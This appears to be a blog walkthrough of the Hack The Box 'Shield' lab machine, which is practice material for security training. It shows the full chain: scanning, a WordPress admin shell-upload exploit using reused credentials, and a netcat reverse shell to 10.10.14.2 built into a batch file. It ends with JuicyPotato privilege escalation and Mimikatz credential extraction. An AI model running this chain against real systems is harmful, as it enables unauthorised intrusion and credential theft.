HTB Starting point – Shield

$ ./portScan.sh

[+] 10.10.10.29 scan started...
[-] Open ports : 80,3306 found

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 19:58 CEST
Nmap scan report for 10.10.10.29
Host is up (0.044s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3306/tcp open  mysql   MySQL (unauthorized)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.69 seconds
[+] 10.10.10.29 scan finished...
  • Port 80 is open (Microsoft IIS running)

Let’s try to see what’s inside…

$ gobuster dir -u http://10.10.10.29/wordpress-w /usr/share/wordlists/dirb/common.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.29/wordpress
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/05/11 23:20:50 Starting gobuster
===============================================================
/index.php (Status: 301)
/wp-admin (Status: 301)
/wp-content (Status: 301)
/wp-includes (Status: 301)
===============================================================
2020/05/11 23:21:14 Finished
===============================================================
  • There is a WordPress instance.

http://10.10.10.29/wordpress/

The usual WordPress login site is: wp-login.php

Access to: http://10.10.10.29/wordpress/wp-login.php

  • Following the last machine’s general rule (let’s try old credentials): admin/P@s5w0rd! will work fine.

Access to the WordPress Control Panel.

Let’s use a wp_admin_shell_upload Metasploit exploit to obtain a functional shell.

$ msfconsole
msf5 > use exploit/unix/webapp/wp_admin_shell_upload

What do we need to use this exploit?

msf5 exploit(unix/webapp/wp_admin_shell_upload) > options

Module options (exploit/unix/webapp/wp_admin_shell_upload):

  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD                    yes       The WordPress password to authenticate with
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The base path to the wordpress application
  USERNAME                    yes       The WordPress username to authenticate with
  VHOST                       no        HTTP server virtual host

Exploit target:
  Id  Name
  --  ----
  0   WordPress

Set the corresponding options and run the exploit.

Done we’ve got a meterpreter shell.

Now can upload a Netcat executable to be able to get a more stable shell.

meterpreter > lcd /home/ruben/Downloads
meterpreter > cd C:/inetpub/wwwroot/wordpress/wp-content/uploads

meterpreter > upload nc.exe

From another local shell:

$ nc -lnvp 1234

meterpreter > sysinfo

Computer    : SHIELD
OS          : Windows NT SHIELD 10.0 build 14393 (Windows Server 2016) i586
Meterpreter : php/windows

As the OS is Windows Server 2016 it can vulnerable to the Rotten Potato exploit.

https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/

Juicy Potato is a variant of the exploit that allows service accounts on Windows to escalate to SYSTEM (highest privileges) by leveraging the BITS and the SeAssignPrimaryToken or SeImpersonate privilege in a MiTM attack.

https://github.com/ohpe/juicy-potatohttps://ohpe.it/juicy-potato/

meterpreter > upload JuicyPotato.exe

[*] uploading  : JuicyPotato.exe -> JuicyPotato.exe
[*] Uploaded -1.00 B of 339.50 KiB (-0.0%): JuicyPotato.exe -> JuicyPotato.exe
[*] uploaded   : JuicyPotato.exe -> JuicyPotato.exe

Create a shell file to run a shell using the Juicy Potato exploit.

echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.2 1111 > rf.bat
meterpreter > upload rf.bat

Run the bat file.

Now we’ve got another shell.
This time we are admin.

We can get finally the flag.

There’s a user called sandra but no flag was found in the Desktop as usual.

In this point we currently own this machine but we can do a little more.

Run Mimikatz:

According to it’s Github description:

Mimikatz is a tool I’ve made to learn C and make some experiments with Windows security. It’s now well known to extract plaintexts passwords, hash, PIN code and Kerberos tickets from memory. Mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.

https://github.com/gentilkiwi/mimikatz

List all available provider credentials. This usually shows recently logged on user and computer credentials.

Finally we obtain Sandra’s password.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *